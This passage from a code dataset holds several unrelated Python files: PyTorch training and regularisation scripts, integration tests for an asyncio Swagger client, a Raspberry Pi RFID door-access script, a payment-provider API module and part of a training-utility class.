table.split('\\n')[2]\n print(table)\n\n if (epoch + 1) % args.save_freq == 0:\n utils.save_checkpoint(\n args.dir,\n args.init_epochs + epoch + 1,\n epoch=args.init_epochs + epoch + 1,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict()\n )\n\n utils.save_checkpoint(\n args.dir,\n args.init_epochs + epoch + 1,\n name='swa',\n epoch=args.init_epochs + epoch + 1,\n state_dict=swa_model.state_dict(),\n )\n\n# utils.save_checkpoint(\n# args.dir,\n# args.init_epochs + args.swa_epochs,\n# epoch=args.init_epochs + args.swa_epochs,\n# state_dict=model.state_dict(),\n# optimizer=optimizer.state_dict()\n# )\n#\n# utils.save_checkpoint(\n# args.dir,\n# args.init_epochs + args.swa_epochs,\n# name='swa',\n# epoch=args.init_epochs + args.swa_epochs,\n# state_dict=swa_model.state_dict(),\n# )","sub_path":"BatchHess_Code/run_gadam_gap.py","file_name":"run_gadam_gap.py","file_ext":"py","file_size_in_byte":9895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"171263845","text":"import asyncio\nimport io\nimport os.path\nimport time\n\nimport pytest\nfrom bravado import requests_client\nfrom bravado.client import SwaggerClient\nfrom bravado.exception import BravadoTimeoutError\nfrom bravado.exception import HTTPBadRequest\nfrom bravado.exception import HTTPInternalServerError\nfrom bravado.exception import HTTPNotFound\n\nfrom bravado_asyncio import http_client\n\n\n@pytest.fixture(params=[http_client.AsyncioClient, requests_client.RequestsClient])\ndef swagger_client(integration_server, request):\n # Run all integration tests twice, once with our AsyncioClient and once again with the RequestsClient\n # to make sure they both behave the same.\n # Once this integration suite has become stable (i.e. we're happy with the approach and the test coverage)\n # it could move to bravado and test all major HTTP clients (requests, fido, asyncio).\n spec_url = '{}/swagger.yaml'.format(integration_server)\n return SwaggerClient.from_url(\n spec_url,\n http_client=request.param(),\n config={'also_return_response': True},\n )\n\n\ndef test_get_query_args(swagger_client):\n result, response = swagger_client.user.loginUser(\n username='asyncio',\n password='p%s&wörd?',\n invalidate_sessions=True,\n ).result(timeout=1)\n\n assert result == 'success'\n # let's make sure we can access the headers through the response object\n assert response.headers['X-Rate-Limit'] == '4711'\n assert response.headers['X-Expires-After'] == 'Expiration date'\n\n\ndef test_param_multi(swagger_client):\n result, response = swagger_client.pet.getPetsByIds(\n petIds=[23, 42],\n ).result(timeout=1)\n\n assert len(result) == 2\n assert result[0]._as_dict() == {\n 'id': 23,\n 'name': 'Takamoto',\n 'photoUrls': [],\n 'category': None,\n 'status': None,\n 'tags': None,\n }\n assert result[1]._as_dict() == {\n 'id': 42,\n 'name': 'Lili',\n 'photoUrls': [],\n 'category': None,\n 'status': None,\n 'tags': None,\n }\n\n\ndef test_response_headers(swagger_client):\n \"\"\"Make sure response headers are returned in the same format across HTTP clients. Namely,\n make sure names and values are str, and that it's possible to access headers in a\n case-insensitive manner.\"\"\"\n _, response = swagger_client.pet.getPetById(petId=42).result(timeout=1)\n assert response.headers['content-type'] == response.headers['Content-Type'] == 'application/json; charset=utf-8'\n\n\ndef test_post_form_data(swagger_client):\n result, _ = swagger_client.pet.updatePetWithForm(\n petId=12,\n name='Vivi',\n status='sold',\n userId=42,\n photoUrls=('http://first.url?param1=value1¶m2=ß%$', 'http://second.url'),\n ).result(timeout=1)\n assert result is None\n\n\ndef test_put_json_body(swagger_client):\n # the test server would raise a 404 if the data didn't match\n result, _ = swagger_client.pet.updatePet(\n body={\n 'id': 42,\n 'category': {\n 'name': 'extracute',\n },\n 'name': 'Lili',\n 'photoUrls': [],\n 'status': 'sold',\n },\n ).result(timeout=1)\n\n assert result is None\n\n\ndef test_delete_query_args(swagger_client):\n result, _ = swagger_client.pet.deletePet(petId=5).result(timeout=1)\n assert result is None\n\n\ndef test_post_file_upload(swagger_client):\n with open(os.path.join(os.path.dirname(__file__), '../../testing/sample.jpg'), 'rb') as image:\n result, _ = swagger_client.pet.uploadFile(\n petId=42,\n file=image,\n userId=12,\n ).result(timeout=1)\n\n\ndef test_post_file_upload_stream_no_name(swagger_client):\n with open(os.path.join(os.path.dirname(__file__), '../../testing/sample.jpg'), 'rb') as image:\n bytes_io = io.BytesIO(image.read()) # BytesIO has no attribute 'name'\n result, _ = swagger_client.pet.uploadFile(\n petId=42,\n file=bytes_io,\n userId=12,\n ).result(timeout=1)\n\n\ndef test_get_msgpack(swagger_client):\n result, response = swagger_client.pet.getPetsByName(petName='lili').result(timeout=1)\n\n assert len(result) == 1\n assert result[0]._as_dict() == {\n 'id': 42,\n 'name': 'Lili',\n 'photoUrls': [],\n 'category': None,\n 'status': None,\n 'tags': None,\n }\n assert response.headers['Content-Type'] == 'application/msgpack'\n\n\ndef test_server_400(swagger_client):\n with pytest.raises(HTTPBadRequest):\n swagger_client.user.loginUser(username='not', password='correct').result(timeout=1)\n\n\ndef test_server_404(swagger_client):\n with pytest.raises(HTTPNotFound):\n swagger_client.pet.getPetById(petId=5).result(timeout=1)\n\n\ndef test_server_500(swagger_client):\n with pytest.raises(HTTPInternalServerError):\n swagger_client.pet.deletePet(petId=42).result(timeout=1)\n\n\ndef test_timeout_on_future(swagger_client):\n with pytest.raises(BravadoTimeoutError):\n bravado_future = swagger_client.store.getInventory()\n bravado_future.result(timeout=0.1)\n\n\n@pytest.mark.xfail(reason='Timeout exception is not raised reliably for AsyncioClient')\ndef test_timeout_request_options(swagger_client):\n with pytest.raises(BravadoTimeoutError):\n bravado_future = swagger_client.store.getInventory(_request_options={'timeout': 0.1})\n bravado_future.result(timeout=None)\n\n\n@pytest.mark.xfail(reason='Execution time is not always below 2 seconds especially for Python 3.5')\ndef test_client_from_asyncio(integration_server):\n \"\"\"Let's make sure that the event loop for our HTTP client that runs in a different thread\n behaves properly with the 'standard' asyncio loop that people would normally use when doing\n asynchronous programming. While we're at it, let's also make sure two instances of\n AsyncioClient work well together.\"\"\"\n # recreate the separate event loop and client session for the HTTP client so we start with a clean slate\n # this is important since we measure the time this test takes, and the test_timeout() tasks might\n # interfere with it\n http_client.client_session.close()\n http_client.client_session = None\n # not going to properly shut down the running loop, this will be cleaned up on exit\n http_client.loop = None\n\n loop = asyncio.get_event_loop()\n start_time = time.time()\n loop.run_until_complete(_test_asyncio_client(integration_server))\n end_time = time.time()\n\n # There are three things being executed asynchronously:\n # 1. sleep 1 second in the main event loop\n # 2. fetch the response for client1 (the server sleeps 1 second)\n # 3. fetch the response for client2 (the server sleeps 1 second)\n # All of this combined should take only a bit more than one second.\n # While this assertion could become flaky depending on how busy the system that runs the test\n # is for now it's a nice confirmation that things work as expected. We can remove it later if\n # it becomes a problem.\n assert end_time - start_time < 2\n\n\nasync def sleep_coroutine():\n await asyncio.sleep(1)\n return 42\n\n\nasync def get_swagger_client(spec_url):\n return SwaggerClient.from_url(\n spec_url,\n http_client=http_client.AsyncioClient(),\n )\n\n\nasync def _test_asyncio_client(integration_server):\n spec_url = '{}/swagger.yaml'.format(integration_server)\n # schedule our first coroutine (after _test_asyncio_client) in the default event loop\n future = asyncio.ensure_future(sleep_coroutine())\n # more work for the default event loop\n client1 = await get_swagger_client(spec_url)\n client2 = await get_swagger_client(spec_url.replace('localhost', '127.0.0.1'))\n\n # two tasks for the event loop running in a separate thread\n future1 = client1.store.getInventory()\n future2 = client2.store.getInventory()\n\n result = await future\n assert result == 42\n\n result1 = future1.result(timeout=5)\n assert result1 == {}\n\n result2 = future2.result(timeout=5)\n assert result2 == {}\n\n return True\n","sub_path":"tests/integration/integration_test.py","file_name":"integration_test.py","file_ext":"py","file_size_in_byte":8103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"473614683","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\n\n# Over Fit Model\nclass OverFitModel(torch.nn.Module):\n def __init__(self):\n super(OverFitModel, self).__init__()\n self.linear = torch.nn.Linear(5, 1) # One in and one out\n\n def forward(self, x):\n return self.linear(x)\n\nif __name__ == \"__main__\":\n # all data\n train_x_plot_u = np.arange(0, 5 + 1, 0.01)\n train_x_plot_o = np.array([[e, e ** 2, e**3, e**4, e**5] for e in train_x_plot_u])\n train_x_u = np.arange(0, 5 + 1, 1)\n train_x_o = np.array([[e, e ** 2, e**3, e**4, e**5] for e in train_x_u])\n # train_noise = -3 + 6 * np.random.rand(len(train_x_u)) \n train_noise = np.array([-2.06345651, 0.06141883, -2.26895645, -2.03486411, 1.28754263, -2.5007614 ])\n train_y = (train_x_u - 2.5 ) ** 2 + 7 + train_noise\n \n test_x_plot_u = np.arange(6, 9 + 1, 0.01)\n test_x_plot_o = np.array([[e, e ** 2, e**3, e**4, e**5] for e in test_x_plot_u])\n test_x_u = np.arange(6, 9 + 1, 1)\n test_x_o = np.array([[e, e ** 2, e**3, e**4, e**5] for e in test_x_u])\n test_y = (test_x_u - 2.5 ) ** 2 + 7\n\n # numpy to torch.tensor\n train_tensor_x_plot_u = torch.Tensor([[e] for e in train_x_plot_u]) # 将1维的数据转换为2维数据\n train_tensor_x_plot_o = torch.Tensor(train_x_plot_o) # 将1维的数据转换为2维数据\n train_tensor_x_u= torch.Tensor([[e] for e in train_x_u]) # 将1维的数据转换为2维数据\n train_tensor_x_o= torch.Tensor(train_x_o) # 将1维的数据转换为2维数据\n train_tensor_y = torch.Tensor([[e] for e in train_y])\n\n\n test_tensor_x_plot_u = torch.Tensor([[e] for e in test_x_plot_u]) # 将1维的数据转换为2维数据\n test_tensor_x_plot_o = torch.Tensor(test_x_plot_o) # 将1维的数据转换为2维数据\n test_tensor_x_u= torch.Tensor([[e] for e in test_x_u]) # 将1维的数据转换为2维数据\n test_tensor_x_o= torch.Tensor(test_x_o) # 将1维的数据转换为2维数据\n test_tensor_y = torch.Tensor([[e] for e in test_y])\n\n n_train_time_over_fit = 240000\n # n_train_time_over_fit = 10\n\n\n \n\n y_lim = [0, 20]\n \n # Over Fit Train \n over_fit_model = OverFitModel()\n loss_fun = torch.nn.MSELoss() # Defined loss function\n over_fit_opt = torch.optim.Adam(over_fit_model.parameters(), lr=0.01) # Defined optimizer\n for epoch in range(n_train_time_over_fit):\n tmp_pred_tensor_y = over_fit_model(train_tensor_x_o) # Forward pass\n loss = loss_fun(tmp_pred_tensor_y, train_tensor_y) # Compute loss\n if epoch % (n_train_time_over_fit/10) == 0:\n print(epoch, loss.data.numpy())\n over_fit_opt.zero_grad() # Zero gradients \n loss.backward() # perform backward pass\n over_fit_opt.step() # update weights\n over_fit_train_y = over_fit_model(train_tensor_x_o)\n loss_over_fit_train = loss_fun(over_fit_train_y, train_tensor_y).data.numpy()\n over_fit_plot_train_y = over_fit_model(train_tensor_x_plot_o)\n\n over_fit_test_y = over_fit_model(test_tensor_x_o)\n loss_over_fit_test = loss_fun(over_fit_test_y, test_tensor_y).data.numpy()\n over_fit_plot_test_y = over_fit_model(test_tensor_x_plot_o) \n print(\"Done over fit\")\n\n\n\n\n\n\n\n # L1 normlization Fit Train \n over_fit_model = OverFitModel()\n loss_fun = torch.nn.MSELoss()\n l1_lambda = torch.tensor(1000.)\n\n # over_fit_opt = torch.optim.Adam(over_fit_model.parameters(), lr=0.01, weight_decay=10) # With L2 normlization\n over_fit_opt = torch.optim.Adam(over_fit_model.parameters(), lr=0.01) # With L2 normlization\n for epoch in range(n_train_time_over_fit):\n tmp_pred_tensor_y = over_fit_model(train_tensor_x_o) # Forward pass\n loss = loss_fun(tmp_pred_tensor_y, train_tensor_y) # Compute loss\n\n # use L1 normlization\n l1_loss = torch.tensor(0.)\n for param in over_fit_model.parameters():\n l1_loss += torch.sum(torch.abs(param))\n loss += l1_lambda * l1_loss\n\n if epoch % (n_train_time_over_fit/10) == 0:\n print(epoch, loss.data.numpy())\n over_fit_opt.zero_grad() # Zero gradients \n loss.backward() # perform backward pass\n over_fit_opt.step() # update weights\n l2_train_y = over_fit_model(train_tensor_x_o)\n loss_l2_train = loss_fun(l2_train_y, train_tensor_y).data.numpy()\n l2_plot_train_y = over_fit_model(train_tensor_x_plot_o)\n\n l2_test_y = over_fit_model(test_tensor_x_o)\n loss_l2_test = loss_fun(l2_test_y, test_tensor_y).data.numpy()\n l2_plot_test_y = over_fit_model(test_tensor_x_plot_o) \n print(\"Done L1 normalization \")\n\n\n\n plt.figure()\n\n plt.subplot(2,2,1) \n plt.title(\"Over Fit(Train Set), Loss=%.3f\" % loss_over_fit_train) \n plt.xlabel(\"x\") \n plt.ylabel(\"y\") \n plt.scatter(train_x_u, train_y)\n plt.plot(train_x_plot_u, over_fit_plot_train_y.data.numpy(), color='red')\n plt.ylim(y_lim)\n for a, b in zip(train_x_u, train_y): \n plt.text(a, b, np.round(b, 1),ha='center', va='bottom', fontsize=10) \n\n \n plt.subplot(2,2,2) \n plt.title(\"L1 normlization(Train Set), Loss=%.3f\" % loss_l2_train) \n plt.xlabel(\"x\") \n plt.ylabel(\"y\") \n plt.scatter(train_x_u, train_y)\n plt.plot(train_x_plot_u, l2_plot_train_y.data.numpy(), color='orange')\n plt.ylim(y_lim)\n for a, b in zip(train_x_u, train_y): \n plt.text(a, b, np.round(b, 1),ha='center', va='bottom', fontsize=10) \n\n\n\n\n plt.subplot(2,2,3) \n plt.title(\"Over Fit(Test Set), Loss=%.3f\" % loss_over_fit_test) \n plt.xlabel(\"x\") \n plt.ylabel(\"y\") \n plt.scatter(test_x_u, test_y)\n plt.plot(test_x_plot_u, over_fit_plot_test_y.data.numpy(), color='red')\n plt.ylim([-1000,1000])\n for a, b in zip(test_x_u, test_y): \n plt.text(a, b, np.round(b, 1),ha='center', va='bottom', fontsize=10) \n \n plt.subplot(2,2,4) \n plt.title(\"L1 normlization (Test Set), Loss=%.3f\" % loss_l2_test) \n plt.xlabel(\"x\") \n plt.ylabel(\"y\") \n plt.scatter(test_x_u, test_y)\n plt.plot(test_x_plot_u, l2_plot_test_y.data.numpy(), color='orange')\n plt.ylim([0, 100])\n for a, b in zip(test_x_u, test_y): \n plt.text(a, b, np.round(b, 1),ha='center', va='bottom', fontsize=10) \n plt.show()","sub_path":"plot_fit/over_filt_L1.py","file_name":"over_filt_L1.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"180938024","text":"#!/usr/bin/env python3\n\nimport re # Regex module\nfrom sites.api import * # Sites API's\n\nclass Product:\n '''\n Class to hold product details\n '''\n def __init__(self, link):\n self.link = link # Product link\n self.fetched = False # Fetch state\n\n def __repr__(self):\n return \"{}\".format(self.link.split('/')[-1])\n\n def fetch(self):\n '''\n Will be responsible for the comunication with the correct API\n '''\n if self.link != '' and self.fetched == False:\n # Check which API to use\n self.api = choose_api(self.link)\n\n # Store product info on the self.info\n self.info = self.api.fetch(self.api, self.link)\n self.fetched = True\n\n else:\n if self.link == '':\n raise Exception('Link is empty')\n\n def get_title(self):\n '''\n Will return the title of the product\n '''\n if self.fetched == False:\n # try:\n self.fetch()\n return self.info['title']\n # except:\n # return \"No title available! Link: {}\".format(self.link[-15:])\n else:\n return self.info['title']\n\n def get_price(self):\n '''\n Will return the price of the product\n '''\n if self.fetched == False:\n # try:\n self.fetch()\n return self.info['price']\n # except:\n # return 0\n else:\n return self.info['price']\n\n def get_discount(self):\n '''\n Get the boolean\n '''\n if self.fetched == False:\n self.fetch()\n return self.info['discount']\n else:\n return self.info['discount']\n","sub_path":"src/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"401372188","text":"# -*- coding: utf8 -*-\nfrom Adafruit_CharLCD import Adafruit_CharLCD\nimport time\nimport MFRC522\nimport RPi.GPIO as GPIO\nfrom time import sleep\npin=19\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(pin, GPIO.OUT)\n\n# UID dos cartões que possuem acesso liberado.\nCARTOES_LIBERADOS = {\n 'B4:8F:C6:CB:36': 'tag1',\n 'E3:E5:68:9A:F4': 'tag2',\n 'A4:42:26:5:C5': 'Cartaozinho',\n '48:F1:74:19:D4': 'Joao',\n}\nlcd = Adafruit_CharLCD(7, 13, 6, 24, 5, 16, 20, 4)\nflag=0\n\n\ntry:\n # Inicia o módulo RC522.\n LeitorRFID = MFRC522.MFRC522()\n lcd.clear()\n lcd.message('Aproxime seu cartao RFID')\n print('Aproxime seu cartão RFID')\n \n while True:\n # Verifica se existe uma tag próxima do módulo.\n status, tag_type = LeitorRFID.MFRC522_Request(LeitorRFID.PICC_REQIDL)\n \n if (status == LeitorRFID.MI_OK and flag==0):\n \n print('Cartão detectado!')\n lcd.clear()\n lcd.message('Cartao detectado!')\n flag=1\n # Efetua leitura do UID do cartão.\n status, uid = LeitorRFID.MFRC522_Anticoll()\n \n if status == LeitorRFID.MI_OK:\n uid = ':'.join(['%X' % x for x in uid])\n lcd.clear()\n lcd.message('UID do cartao: %s' % uid)\n print('UID do cartão: %s' % uid)\n \n \n # Se o cartão está liberado exibe mensagem de boas vindas.\n if uid in CARTOES_LIBERADOS:\n print('Acesso Liberado!')\n lcd.clear()\n lcd.message('Ola %s.' % CARTOES_LIBERADOS[uid])\n print('Olá %s.' % CARTOES_LIBERADOS[uid])\n p = GPIO.PWM(pin, 1024)\n p.start(99)\n sleep(0.25)\n p.stop()\n \n else:\n lcd.clear()\n lcd.message('Acesso negado!')\n print('Acesso Negado!')\n \n time.sleep(2)\n lcd.clear()\n lcd.message('Aproxime seu cartao RFID')\n print('\\n')\n print('Aproxime seu cartão RFID')\n print('\\n')\n \n elif(status == LeitorRFID.MI_ERR and flag==1):\n flag = 0\n \n time.sleep(2)\nexcept KeyboardInterrupt:\n # Se o usuário precionar Ctrl + C\n # encerra o programa.\n #GPIO.cleanup()\n print('Programa encerrado.')","sub_path":"codigo rfid.py","file_name":"codigo rfid.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"258416911","text":"# -*- coding: utf-8 -*-\n# Copyright 2017 GIG Technology NV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# @@license_version:1.3@@\n\nimport httplib\nimport json\nimport logging\nimport urllib\nimport uuid\n\nfrom google.appengine.api import urlfetch\nfrom google.appengine.ext import deferred\n\nfrom mcfw.rpc import returns, arguments, parse_complex_value\nfrom rogerthat.bizz.payment import sync_payment_asset, sync_payment_database\nfrom rogerthat.bizz.payment.providers.threefold.consts import PAYMENT_PROVIDER_ID\nfrom rogerthat.bizz.payment.state import add_code_to_login_state\nfrom rogerthat.bizz.user import get_lang\nfrom rogerthat.dal.payment import get_payment_provider, get_payment_user\nfrom rogerthat.exceptions.payment import PaymentException\nfrom rogerthat.rpc import users\nfrom rogerthat.settings import get_server_settings\nfrom rogerthat.to.payment import GetPaymentProfileResponseTO, PaymentProviderAssetTO, CreatePaymentAssetTO, \\\n CryptoTransactionTO, ErrorPaymentTO, GetPaymentTransactionsResponseTO, CreateTransactionResultTO, TargetInfoTO\nfrom rogerthat.utils import urlencode\n\n\ndef web_callback(handler, path, params):\n \"\"\"\n Args:\n handler (webapp2.RequestHandler)\n path (unicode)\n params (dict)\n \"\"\"\n if u'oauth' == path:\n handle_oauth(handler, params)\n elif u'sync' == path:\n handle_sync(handler, params)\n else:\n handler.abort(404)\n\n\ndef handle_code(login_state):\n \"\"\"\n This method should in theory be the same for every payment provider if they implement oauth properly\n Args:\n login_state (rogerthat.models.payment.PaymentOauthLoginState)\n Returns:\n dict\n \"\"\"\n provider = get_payment_provider(PAYMENT_PROVIDER_ID)\n parameters = {\n 'code': login_state.code,\n 'redirect_uri': provider.redirect_url(get_server_settings().baseUrl),\n 'client_id': provider.oauth_settings.client_id,\n 'client_secret': provider.oauth_settings.secret,\n 'state': login_state.state\n }\n url = '%s?%s' % (provider.oauth_settings.token_url, urllib.urlencode(parameters))\n logging.debug('URL: %s', url)\n result = urlfetch.fetch(url, method=urlfetch.POST)\n if result.status_code != httplib.OK:\n logging.error('Failed to get acccess token. %s: %s', result.status_code, result.content)\n raise Exception('Failed to get access token')\n return json.loads(result.content)\n\n\ndef handle_oauth(handler, params):\n state = params['state']\n code = params['code']\n app_id = add_code_to_login_state(state, code)\n if not app_id:\n handler.abort(400)\n return\n\n url = 'oauth-%s://x-callback-url' % app_id.encode('utf8')\n args = {'state': state, 'code': code}\n handler.redirect(str('%s?%s' % (url, urllib.urlencode(args))))\n\n\ndef handle_sync(handler, params):\n payment_provider = get_payment_provider(PAYMENT_PROVIDER_ID)\n if payment_provider.get_setting('payment_secret') != handler.request.headers.get(\"Authorization\"):\n handler.abort(403)\n return\n\n app_user = users.User(params['app_user'])\n asset_id = params['asset_id']\n \n payment_user = get_payment_user(app_user)\n if payment_user and payment_user.has_asset(PAYMENT_PROVIDER_ID, asset_id):\n deferred.defer(sync_payment_asset, app_user, PAYMENT_PROVIDER_ID, asset_id)\n else:\n deferred.defer(sync_payment_database, app_user)\n\n\n@returns(GetPaymentProfileResponseTO)\n@arguments(app_user=users.User)\ndef get_payment_profile(app_user):\n response = GetPaymentProfileResponseTO()\n response.first_name = u'FAKE fn'\n response.last_name = u'FAKE ln'\n return response\n\n\ndef _get_payment_request_params():\n payment_provider = get_payment_provider(PAYMENT_PROVIDER_ID)\n payment_url = payment_provider.get_setting('payment_url')\n payment_secret = payment_provider.get_setting('payment_secret')\n\n headers = {}\n headers['Authorization'] = payment_secret\n return payment_url, headers\n\n\ndef _execute_payment_request(path, args):\n base_url, headers = _get_payment_request_params()\n\n result = urlfetch.fetch(\n url=u\"%s/%s?%s\" % (base_url, path, urlencode(args)),\n method=urlfetch.GET,\n headers=headers,\n deadline=10)\n\n if result.status_code != 200:\n return None\n\n return json.loads(result.content)\n\n\n@returns([PaymentProviderAssetTO])\n@arguments(app_user=users.User, currency=unicode)\ndef get_payment_assets(app_user, currency=None):\n args = dict()\n args[\"app_user\"] = app_user.email()\n result = _execute_payment_request(u'assets', args)\n if not result:\n return []\n return parse_complex_value(PaymentProviderAssetTO, result, True)\n\n\n@returns(PaymentProviderAssetTO)\n@arguments(app_user=users.User, asset_id=unicode)\ndef get_payment_asset(app_user, asset_id):\n result = _execute_payment_request(u'assets/%s' % urllib.quote(asset_id), dict())\n if not result:\n return None\n return parse_complex_value(PaymentProviderAssetTO, result, False)\n\n\n@returns(unicode)\n@arguments(app_user=users.User, asset_id=unicode)\ndef get_payment_asset_currency(app_user, asset_id):\n return asset_id.rsplit(u\":\", 1)[1]\n\n\n@returns(PaymentProviderAssetTO)\n@arguments(app_user=users.User, asset=CreatePaymentAssetTO)\ndef create_payment_asset(app_user, asset):\n language = get_lang(app_user)\n raise PaymentException(ErrorPaymentTO.ACCOUNT_ALREADY_EXISTS, language,\n {'currency': asset.currency})\n\n\n@returns(tuple)\n@arguments(asset_id=unicode, transaction_type=unicode, cursor=unicode)\ndef _get_transactions_by_type(asset_id, transaction_type, cursor):\n args = dict()\n args[\"asset_id\"] = asset_id\n args[\"transaction_type\"] = transaction_type\n if cursor:\n args[\"cursor\"] = cursor\n result = _execute_payment_request(u'transactions', args)\n if not result:\n return [], None\n to = parse_complex_value(GetPaymentTransactionsResponseTO, result, False)\n return to.transactions, to.cursor\n\n\n@returns(tuple)\n@arguments(app_user=users.User, asset_id=unicode, cursor=unicode)\ndef get_confirmed_transactions(app_user, asset_id, cursor=None):\n return _get_transactions_by_type(asset_id, u\"confirmed\", cursor)\n\n\n@returns(tuple)\n@arguments(app_user=users.User, asset_id=unicode, cursor=unicode)\ndef get_pending_transactions(app_user, asset_id, cursor=None):\n return _get_transactions_by_type(asset_id, u\"pending\", cursor)\n\n\n@returns(bool)\n@arguments(app_user=users.User, asset_id=unicode, code=unicode)\ndef verify_payment_asset(app_user, asset_id, code):\n raise NotImplementedError(u'verify_payment_asset is not implemented yet')\n\n\n@returns(CryptoTransactionTO)\n@arguments(app_user=users.User, transaction_id=unicode, from_asset_id=unicode, to_asset_id=unicode, amount=(int, long),\n currency=unicode, memo=unicode, precision=(int, long))\ndef get_payment_signature_data(app_user, transaction_id, from_asset_id, to_asset_id, amount, currency, memo, precision):\n return None\n\n\n@returns(unicode)\n@arguments(from_user=users.User, to_user=users.User, transaction_id=unicode, from_asset_id=unicode, to_asset_id=unicode,\n amount=(int, long), currency=unicode, memo=unicode, precision=(int, long), crypto_transaction=CryptoTransactionTO)\ndef confirm_payment(from_user, to_user, transaction_id, from_asset_id, to_asset_id, amount, currency, memo,\n precision, crypto_transaction):\n return _create_transaction(transaction_id, amount, precision, memo, from_asset_id, to_asset_id, from_user)\n\n\n@returns()\n@arguments()\ndef sync():\n pass\n\n\n@returns(CreateTransactionResultTO)\n@arguments(app_user=users.User, params=unicode)\ndef create_transaction(app_user, params):\n transaction_id = unicode(uuid.uuid4())\n payload = json.loads(params)\n\n status = _create_transaction(transaction_id,\n payload['amount'],\n payload['precision'],\n payload['memo'],\n payload['from_asset_id'],\n payload['to_asset_id'],\n app_user)\n\n result_params = {\n u'app_user': app_user.email(),\n u'success': True,\n u'provider_id': PAYMENT_PROVIDER_ID,\n u'transaction_id': transaction_id,\n u'status': status\n }\n\n r = CreateTransactionResultTO()\n r.params = unicode(json.dumps(result_params))\n r.transaction_id = transaction_id\n return r\n\n\n@returns(dict)\n@arguments(transaction_id=unicode)\ndef get_public_transaction(transaction_id):\n return _execute_payment_request(u'transactions/%s/public' % transaction_id, {})\n\n\ndef _create_transaction(transaction_id, amount, precision, memo, from_asset_id, to_asset_id, app_user):\n base_url, headers = _get_payment_request_params()\n headers[\"Content-Type\"] = \"application/json\"\n\n payload = {\n 'id': transaction_id,\n 'amount': amount,\n 'precision': precision,\n 'memo': memo,\n 'from_asset_id': from_asset_id,\n 'to_asset_id': to_asset_id\n }\n\n result = urlfetch.fetch(\n url=u\"%s/transactions\" % base_url,\n payload=json.dumps(payload),\n method=urlfetch.POST,\n headers=headers,\n deadline=10)\n\n if result.status_code not in (200, 201):\n logging.debug('Error from ThreeFold backend: %s %s', result.status_code, result.content)\n language = get_lang(app_user)\n raise PaymentException(ErrorPaymentTO.UNKNOWN, language)\n\n return json.loads(result.content)[\"status\"]\n\n\n@returns(TargetInfoTO)\n@arguments(target_user=users.User, currency=unicode, settings=dict)\ndef get_target_info_service(target_user, currency, settings):\n return None\n","sub_path":"src/rogerthat/bizz/payment/providers/threefold/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"50544677","text":"import os\nimport time\nimport random\nfrom copy import copy\n\nimport numpy as np\nimport torch\n\nfrom tensorboardX import SummaryWriter\n\nfrom torchsupport.data.io import netwrite, to_device\nfrom torchsupport.data.episodic import SupportData\nfrom torchsupport.data.collate import DataLoader\n\nfrom torchsupport.training.state import (\n TrainingState, NetState, State, SaveStateError\n)\n\nclass Training(object):\n \"\"\"Abstract training process class.\"\"\"\n checkpoint_parameters = []\n torch_rng_state = torch.random.get_rng_state()\n np_rng_state = np.random.get_state()\n random_rng_state = random.getstate()\n\n save_interval = 600\n last_tick = 0\n\n def __init__(self):\n pass\n\n def each_step(self):\n self.save_tick()\n\n def each_validate(self):\n pass\n\n def each_epoch(self):\n pass\n\n def each_checkpoint(self):\n pass\n\n def train(self):\n pass\n\n def validate(self):\n pass\n\n def save_path(self):\n raise NotImplementedError(\"Abstract.\")\n\n def write(self, path):\n data = {}\n data[\"_torch_rng_state\"] = torch.random.get_rng_state()\n data[\"_np_rng_state\"] = np.random.get_state()\n data[\"_random_rng_state\"] = random.getstate()\n for param in self.checkpoint_parameters:\n param.write_action(self, data)\n torch.save(data, path)\n\n def read(self, path):\n data = torch.load(path)\n torch.random.set_rng_state(data[\"_torch_rng_state\"])\n np.random.set_state(data[\"_np_rng_state\"])\n random.setstate(data[\"_random_rng_state\"])\n for param in self.checkpoint_parameters:\n param.read_action(self, data)\n\n def save(self, path=None):\n path = path or self.save_path()\n self.write(path)\n\n def save_tick(self, step=None):\n step = step or self.save_interval\n this_tick = time.monotonic()\n if this_tick - self.last_tick > step:\n try:\n self.save()\n self.last_tick = this_tick\n except SaveStateError:\n torch_rng_state = torch.random.get_rng_state()\n np_rng_state = np.random.get_state()\n random_rng_state = random.getstate()\n self.load()\n torch.random.set_rng_state(torch_rng_state)\n np.random.set_state(np_rng_state)\n random.setstate(random_rng_state)\n\n def load(self, path=None):\n path = path or self.save_path()\n if os.path.isfile(path):\n self.read(path)\n return self\n\nclass SupervisedTraining(Training):\n \"\"\"Standard supervised training process.\n\n Args:\n net (Module): a trainable network module.\n train_data (DataLoader): a :class:`DataLoader` returning the training\n data set.\n validate_data (DataLoader): a :class:`DataLoader` return ing the\n validation data set.\n optimizer (Optimizer): an optimizer for the network. Defaults to ADAM.\n schedule (Schedule): a learning rate schedule. Defaults to decay when\n stagnated.\n max_epochs (int): the maximum number of epochs to train.\n device (str): the device to run on.\n checkpoint_path (str): the path to save network checkpoints.\n \"\"\"\n checkpoint_parameters = Training.checkpoint_parameters + [\n TrainingState(),\n NetState(\"net\"),\n NetState(\"optimizer\")\n ]\n def __init__(self, net, train_data, validate_data, losses,\n optimizer=torch.optim.Adam,\n schedule=None,\n max_epochs=50,\n batch_size=128,\n accumulate=None,\n device=\"cpu\",\n 